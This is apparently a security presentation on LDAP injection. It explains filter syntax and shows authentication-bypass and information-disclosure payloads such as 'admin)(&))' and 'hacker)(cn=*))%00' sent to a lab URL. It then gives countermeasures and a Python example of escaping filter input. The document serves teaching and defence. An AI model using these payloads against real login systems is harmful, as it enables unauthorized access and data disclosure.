
LDAP Injection

Understand the web server architecture with an LDAP server and the impact LDAP injection can cause.


  1. LDAP Injection. Swapnil Jain. Date: 28 April 2020
  2. #Who Am I
     ● Security Analyst
     ● Twitter @swapnil_jn
  3. Overview
     ● LDAP Injection
     ● Authentication Bypass
     ● Demo
     ● Impact
     ● Securing Applications against LDAP Injection
  4. LDAP Injection: The Lightweight Directory Access Protocol (LDAP) is used to store information about users, hosts, and many other objects. LDAP injection is a type of attack on a web application where attackers place code in a user input field in an attempt to gain unauthorized access or information.
  5. Basic LDAP Syntax
     Common Operators:
     ● = (equal to)
     ● & (logical and)
     ● | (logical or)
     ● ! (logical not)
     ● * (wildcard)
     Filter:
     ● (cn=sam)
     ● (cn=s*)
     ● (|(cn=s*)(cn=t*))
     ● (&(cn=s*)(sn=*d))
  6. Normal Working: the filter (&(cn=admin)(passwd=secret)) is sent to the LDAP server; admin authenticated.
  7. Authentication Bypass: Username: admin)(&)), Password: ignored. Diagram labels: Web Server, LDAP Server, Directory Search, Admin, Set Cookie: PHPSESSIONID=admin
  8. Test Case
     ● <input type="text" size=20 name="name">Enter the Username to search for</input>
     ● Searchfilter="(cn="+name+")"
     Input: admin)(|(password=*)
     Resulting filter: (cn=admin)(|(password=*))
  9. Authentication Bypass (Normal Request)
  10. Payload Creation
      Original request: http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker&password=hacker
      Payload: name=hacker)(cn=*))%00
      Changed request: http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker)(cn=*))%00&password=hacker
  11. Authentication Bypass (Contd.)
  12. Information Disclosure
  13. Information Disclosure (Contd.)
  14. Impact
      ● Authentication bypass
      ● Privilege escalation
      ● Information disclosure
  15. Countermeasures
      ● LDAP special characters are safely escaped, including at least ( ) ! | & *
      ● Use frameworks that automatically protect from LDAP injection
        ○ LINQ to Active Directory provides LDAP encoding when building LDAP queries.
      ● Least privilege
  16. Thank You
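
The escaping countermeasure from slide 15, as an added example that is not part of the original slides: the concatenated filter from slides 6 and 8 next to a version that escapes user input per RFC 4515 before it reaches the filter. The function names are hypothetical and the inputs are the strings shown on the slides.

```python
# Added example (not from the slides): escape user input before it is placed
# in an LDAP search filter. Function names are hypothetical.

# Characters RFC 4515 requires escaping (\ * ( ) NUL), plus the operators
# slide 15 lists (! | &). Escaping the extra ones is valid and harmless.
_SPECIAL = set('\\*()\x00!|&')


def escape_filter_value(value: str) -> str:
    """Replace each special character with a backslash and its two-digit hex code."""
    return ''.join('\\%02x' % ord(ch) if ch in _SPECIAL else ch for ch in value)


def unsafe_auth_filter(name: str, password: str) -> str:
    # Plain concatenation, as on slide 8: input can add or close filter terms.
    return '(&(cn=' + name + ')(passwd=' + password + '))'


def safe_auth_filter(name: str, password: str) -> str:
    # Same filter shape as slide 6, but input can only ever be a literal value.
    return '(&(cn=%s)(passwd=%s))' % (
        escape_filter_value(name),
        escape_filter_value(password),
    )


if __name__ == '__main__':
    # Inputs taken from slides 7, 8 and 10 (%00 shown here as a decoded NUL).
    samples = ['admin', 'admin)(&))', 'admin)(|(password=*)', 'hacker)(cn=*))\x00']
    for name in samples:
        unsafe = unsafe_auth_filter(name, 'hacker')
        safe = safe_auth_filter(name, 'hacker')
        # A well-formed auth filter here has exactly three opening parentheses.
        print(repr(name))
        print('  concatenated:', repr(unsafe), 'open parens =', unsafe.count('('))
        print('  escaped:     ', repr(safe), 'open parens =', safe.count('('))
```

With escaping, the number of filter terms stays fixed no matter what the user submits. In real code prefer the escaping helper that ships with the LDAP library in use, for example `ldap.filter.escape_filter_chars` in python-ldap.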
